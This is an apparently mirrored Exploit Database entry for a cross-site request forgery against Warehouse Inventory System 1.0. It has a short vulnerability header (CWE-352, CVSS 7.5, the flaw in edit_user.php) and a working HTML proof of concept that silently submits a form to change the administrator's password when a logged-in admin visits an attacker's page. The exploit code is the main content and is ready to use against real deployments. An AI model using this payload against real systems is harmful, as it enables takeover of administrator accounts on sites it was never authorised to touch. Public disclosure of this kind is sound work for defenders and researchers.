Warehouse Inventory System 1.0 – Cross-Site Request Forgery (Change Admin Password)

• Exploit Database
• 110 阅读

• 作者： boku
  日期： 2020-08-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48738/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  # Exploit Title: Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-08-09 # Vendor Homepage:https://oswapp.com # Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # CWE-352: Cross-Site Request Forgery (CSRF) # CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6 # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in &apos;edit_user.php&apos; webpage of OSWAPP&apos;s # Warehouuse Inventory System v1.0 allows remote attackers to change the admins password # via authenticated admin visiting a third-party site.   <html> <body> <script>history.pushState(&apos;&apos;, &apos;&apos;, &apos;/&apos;)</script> <form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST"> <input type="hidden" name="password" value="Boku123!" /> <input type="hidden" name="update&#45;pass" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>